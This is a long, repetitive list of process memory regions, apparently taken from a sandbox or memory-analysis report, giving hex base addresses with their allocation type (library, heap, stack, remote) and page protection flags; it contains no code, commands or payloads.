trusted library allocation
page read and write
2F70000
heap
page read and write
6160000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
7934000
trusted library allocation
page read and write
6D4D000
trusted library allocation
page read and write
6C61000
heap
page read and write
5110000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
A3DA47F000
stack
page read and write
68F0000
trusted library allocation
page read and write
12ED000
trusted library allocation
page execute and read and write
5C5D000
trusted library allocation
page read and write
5436000
heap
page read and write
5220000
trusted library allocation
page read and write
4630000
trusted library allocation
page read and write
6B00000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
A3DA67F000
stack
page read and write
8EF0000
trusted library allocation
page execute and read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
89E5000
trusted library allocation
page read and write
98B3000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5300000
heap
page read and write
8A90000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
672E000
stack
page read and write
52D0000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
7B95000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
5C39000
trusted library allocation
page read and write
5B3D000
stack
page read and write
8960000
trusted library allocation
page read and write
4740000
heap
page execute and read and write
6E8C000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
CFE0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
8830000
unkown
page read and write
FB0000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
618D000
stack
page read and write
6D45000
trusted library allocation
page read and write
8910000
unkown
page read and write
8940000
unkown
page read and write
2F6D000
heap
page read and write
5700000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
4EC0000
heap
page read and write
7B90000
trusted library allocation
page read and write
5280000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
4DD9000
trusted library allocation
page read and write
147C000
trusted library allocation
page read and write
8CE3000
unkown
page read and write
7A80000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
5B51000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
5C66000
trusted library allocation
page read and write
79B5000
trusted library allocation
page read and write
BB0000
heap
page read and write
67C0000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
2F7A000
heap
page read and write
7A00000
unkown
page read and write
7B96000
unkown
page read and write
113D000
trusted library allocation
page execute and read and write
8B00000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
2EDE000
stack
page read and write
8840000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
5430000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
4B03000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
33F0000
trusted library allocation
page read and write
6C61000
heap
page read and write
7A00000
unkown
page read and write
1350000
heap
page read and write
407E000
stack
page read and write
9900000
trusted library allocation
page read and write
116E000
heap
page read and write
5B70000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
4E7A000
heap
page read and write
98F0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
52AC000
stack
page read and write
7990000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
6C61000
heap
page read and write
5360000
heap
page read and write
6D42000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
D1CE000
stack
page read and write
6C61000
heap
page read and write
8B40000
trusted library allocation
page read and write
8C87000
trusted library allocation
page read and write
A2D9000
stack
page read and write
7990000
trusted library allocation
page read and write
155F000
stack
page read and write
56CC000
stack
page read and write
8A00000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5610000
heap
page read and write
78B0000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
10BF000
heap
page read and write
8EA0000
trusted library allocation
page read and write
59F2000
unkown
page read and write
96B000
stack
page read and write
CFD0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C10000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
68A0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A87000
unkown
page read and write
1035000
heap
page read and write
79A0000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
263C000
stack
page read and write
5B50000
trusted library allocation
page read and write
531E000
stack
page read and write
8D30000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
78D0000
unkown
page read and write
5B80000
trusted library allocation
page read and write
7B95000
trusted library allocation
page read and write
6950000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
7430000
heap
page read and write
98E0000
trusted library allocation
page read and write
68B0000
heap
page execute and read and write
6D45000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5392000
heap
page read and write
2707000
stack
page read and write
6D40000
trusted library allocation
page read and write
8BB0000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
52D0000
heap
page read and write
7670000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
5C22000
trusted library allocation
page read and write
1150000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C53000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
53A1000
heap
page read and write
6C82000
direct allocation
page read and write
6190000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D10000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
4710000
trusted library allocation
page read and write
7F900000
trusted library allocation
page execute and read and write
8990000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
6C61000
heap
page read and write
79B0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C29000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
C20000
heap
page read and write
3FFE000
stack
page read and write
8E74000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8A20000
trusted library allocation
page read and write
6C61000
heap
page read and write
873E000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
79A0000
unkown
page read and write
8970000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
11CE000
stack
page read and write
8D70000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
53EA000
heap
page read and write
8EF0000
trusted library allocation
page read and write
640000
heap
page read and write
71DE000
unkown
page read and write
8D60000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C2A000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
74FF000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D42000
trusted library allocation
page read and write
1152000
trusted library allocation
page read and write
881F000
stack
page read and write
6EE0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
551F000
unclassified section
page readonly
79A0000
unkown
page read and write
6D40000
trusted library allocation
page read and write
5B90000
trusted library allocation
page read and write
1306000
trusted library allocation
page execute and read and write
8A90000
trusted library allocation
page read and write
6D14000
trusted library allocation
page read and write
89E0000
trusted library allocation
page read and write
5C68000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
FB1000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
53FD000
heap
page read and write
6C61000
heap
page read and write
79A6000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
8E50000
unkown
page read and write
5BF0000
heap
page read and write
538E000
heap
page read and write
8EA0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
8845000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
4A64000
heap
page read and write
8910000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
23F0000
trusted library section
page read and write
5B50000
trusted library allocation
page read and write
6D4C000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
4BE2000
trusted library allocation
page read and write
538C000
heap
page read and write
4BED000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
109E000
stack
page read and write
5223000
trusted library allocation
page read and write
7995000
unkown
page read and write
294042E0000
heap
page read and write
8ED0000
trusted library allocation
page read and write
8A84000
unkown
page read and write
8D10000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
30C8000
heap
page read and write
8F60000
remote allocation
page read and write
10CD000
heap
page read and write
7930000
trusted library allocation
page read and write
1210000
heap
page read and write
31E000
stack
page read and write
5C5D000
trusted library allocation
page read and write
5C27000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
D34E000
stack
page read and write
3060000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A30000
trusted library allocation
page execute and read and write
8D10000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6970000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
545E000
heap
page read and write
8910000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6E90000
trusted library allocation
page execute and read and write
8EA0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
E9D000
trusted library allocation
page execute and read and write
8EA0000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
E0E000
stack
page read and write
C6E000
stack
page read and write
6AF6000
trusted library allocation
page read and write
6C61000
heap
page read and write
7990000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
1470000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
79AA000
trusted library allocation
page read and write
4E93000
heap
page read and write
6EB0000
stack
page execute and read and write
79B0000
trusted library allocation
page read and write
4CE6000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
5040000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
6D43000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8910000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
5270000
trusted library allocation
page read and write
4A15000
trusted library allocation
page read and write
2E3E000
stack
page read and write
290000
heap
page read and write
89A0000
unkown
page read and write
4D80000
remote allocation
page read and write
8D40000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
D44E000
stack
page read and write
8D30000
trusted library allocation
page read and write
57F0000
heap
page read and write
8D70000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
79E5000
trusted library allocation
page read and write
1115000
heap
page read and write
5472000
heap
page read and write
8870000
trusted library allocation
page read and write
6D90000
trusted library allocation
page execute and read and write
53F1000
heap
page read and write
64A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
D000000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5080000
trusted library allocation
page read and write
4D0A000
trusted library allocation
page read and write
6C61000
heap
page read and write
4A4E000
stack
page read and write
54D0000
trusted library allocation
page read and write
578D000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
5B60000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6E00000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
89E0000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8B50000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
FC0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6EA0000
trusted library allocation
page execute and read and write
106D000
heap
page read and write
5565000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
55DE000
stack
page read and write
8D75000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
799A000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D20000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
145B000
trusted library allocation
page read and write
48FE000
stack
page read and write
5C5F000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
573A000
heap
page read and write
6D30000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
6C61000
heap
page read and write
8E90000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4C5D000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
4DC0000
remote allocation
page read and write
2C3C000
stack
page read and write
5C28000
trusted library allocation
page read and write
26C9000
heap
page read and write
5C27000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
7130000
unkown
page read and write
5C5D000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
9918000
trusted library allocation
page read and write
29404E02000
trusted library allocation
page read and write
6C70000
heap
page read and write
8E20000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5523000
heap
page read and write
5C5D000
trusted library allocation
page read and write
6C1F000
stack
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4420000
trusted library section
page read and write
8910000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
4BEB000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EC0000
trusted library allocation
page read and write
FD8000
heap
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
8910000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5410000
trusted library allocation
page read and write
6940000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6C61000
heap
page read and write
68C0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
4440000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
5406000
heap
page read and write
5B50000
trusted library allocation
page read and write
7A05000
unkown
page read and write
8ED5000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
5961000
direct allocation
page read and write
79D0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
7B90000
unkown
page read and write
4472000
trusted library allocation
page read and write
15A0000
trusted library allocation
page execute and read and write
5C43000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
2990000
heap
page read and write
57A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
64AE000
stack
page read and write
8A40000
trusted library allocation
page read and write
1310000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
1063000
heap
page read and write
74F0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
1075000
heap
page read and write
611F000
stack
page read and write
8ED0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
FB1000
trusted library allocation
page read and write
6910000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
58CF000
stack
page read and write
53F1000
heap
page read and write
5C5D000
trusted library allocation
page read and write
5C22000
trusted library allocation
page read and write
438000
remote allocation
page execute and read and write
8ED0000
trusted library allocation
page read and write
78DE000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
5C2F000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
5C22000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
545B000
heap
page read and write
6D30000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
FB0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
10B6000
heap
page read and write
104D000
heap
page read and write
90EE000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
8AF8000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8910000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
FC0000
trusted library allocation
page read and write
2F73000
heap
page read and write
5C44000
trusted library allocation
page read and write
A3DA87F000
stack
page read and write
8A90000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
7990000
unkown
page read and write
6C00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
3FFF000
trusted library allocation
page read and write
57E1000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
40E9000
trusted library allocation
page read and write
77E1000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
69A0000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
5700000
trusted library allocation
page read and write
1110000
heap
page read and write
8960000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
4CC6000
trusted library allocation
page read and write
5C33000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
112F000
heap
page read and write
5C2E000
trusted library allocation
page read and write
6140000
trusted library allocation
page read and write
2FA4000
heap
page read and write
5C5D000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
942E000
stack
page read and write
FB1000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
506C000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
2FA3000
heap
page read and write
1070000
heap
page read and write
79A0000
trusted library allocation
page read and write
D1D0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
5C41000
trusted library allocation
page read and write
540E000
stack
page read and write
9900000
trusted library allocation
page read and write
53DE000
heap
page read and write
5260000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
3074000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
68F0000
trusted library allocation
page read and write
68D3000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4490000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
1065000
heap
page read and write
8D40000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
79A5000
trusted library allocation
page read and write
8B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
6EC000
stack
page read and write
5C5D000
trusted library allocation
page read and write
1047000
heap
page read and write
1063000
heap
page read and write
6C61000
heap
page read and write
8930000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
5C23000
trusted library allocation
page read and write
5C42000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8ED4000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
8C80000
unkown
page read and write
5B50000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
7B97000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
1113000
heap
page read and write
8830000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
1315000
trusted library allocation
page execute and read and write
73C0000
direct allocation
page read and write
9136000
trusted library allocation
page read and write
D020000
trusted library allocation
page read and write
6C61000
heap
page read and write
8870000
trusted library allocation
page execute and read and write
4E8E000
heap
page read and write
8A80000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
6C61000
heap
page read and write
65B5000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9F90000
trusted library section
page read and write
6820000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8B90000
trusted library allocation
page read and write
78D0000
unkown
page read and write
1140000
trusted library allocation
page read and write
53D8000
heap
page read and write
7A00000
unkown
page read and write
8960000
trusted library allocation
page read and write
8D42000
trusted library allocation
page read and write
5C41000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
320000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
9C6E000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
72C0000
direct allocation
page read and write
6D40000
trusted library allocation
page read and write
5C18000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8FDE000
stack
page read and write
E20000
heap
page read and write
FB0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
879C000
stack
page read and write
54F0000
trusted library allocation
page read and write
1162000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
4C5B000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
105F000
heap
page read and write
8860000
trusted library allocation
page read and write
7340000
direct allocation
page read and write
5560000
trusted library allocation
page read and write
1035000
heap
page read and write
8D70000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
4453000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
D010000
trusted library allocation
page read and write
145E000
stack
page read and write
5B50000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
159E000
stack
page read and write
8A60000
trusted library allocation
page read and write
6C86000
direct allocation
page read and write
4BA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
4730000
trusted library allocation
page read and write
1053000
heap
page read and write
5C5D000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
7ACD000
stack
page read and write
8ED0000
trusted library allocation
page read and write
7995000
trusted library allocation
page read and write
8B40000
trusted library allocation
page read and write
303E000
stack
page read and write
5560000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
105E000
heap
page read and write
7B90000
unkown
page read and write
8940000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5160000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
1064000
heap
page read and write
3080000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8ED9000
trusted library allocation
page read and write
1467000
trusted library allocation
page read and write
89D0000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
7990000
unkown
page read and write
8B50000
trusted library allocation
page read and write
61A4000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
1047000
heap
page read and write
5C29000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
5C31000
trusted library allocation
page read and write
1312000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
105F000
heap
page read and write
8A90000
trusted library allocation
page read and write
6C61000
heap
page read and write
9940000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8B40000
trusted library allocation
page read and write
5A00000
unkown
page read and write
5B80000
trusted library allocation
page read and write
115A000
trusted library allocation
page execute and read and write
5B50000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
1207000
heap
page read and write
5C43000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
565E000
stack
page read and write
5B50000
trusted library allocation
page read and write
8CD5000
trusted library allocation
page read and write
596E000
stack
page read and write
6C61000
heap
page read and write
6D40000
trusted library allocation
page read and write
106A000
heap
page read and write
8B50000
trusted library allocation
page read and write
1090000
heap
page read and write
79A0000
trusted library allocation
page read and write
871F000
stack
page read and write
79A0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
78D8000
trusted library allocation
page read and write
CFF3000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
5C25000
trusted library allocation
page read and write
5600000
unkown
page read and write
4045000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
6C61000
heap
page read and write
6980000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
307A000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
12E0000
trusted library allocation
page read and write
4B6C000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
7660000
trusted library allocation
page execute and read and write
8860000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
909A000
stack
page read and write
79B0000
trusted library allocation
page read and write
68ED000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
42BE000
trusted library allocation
page read and write
5B50000
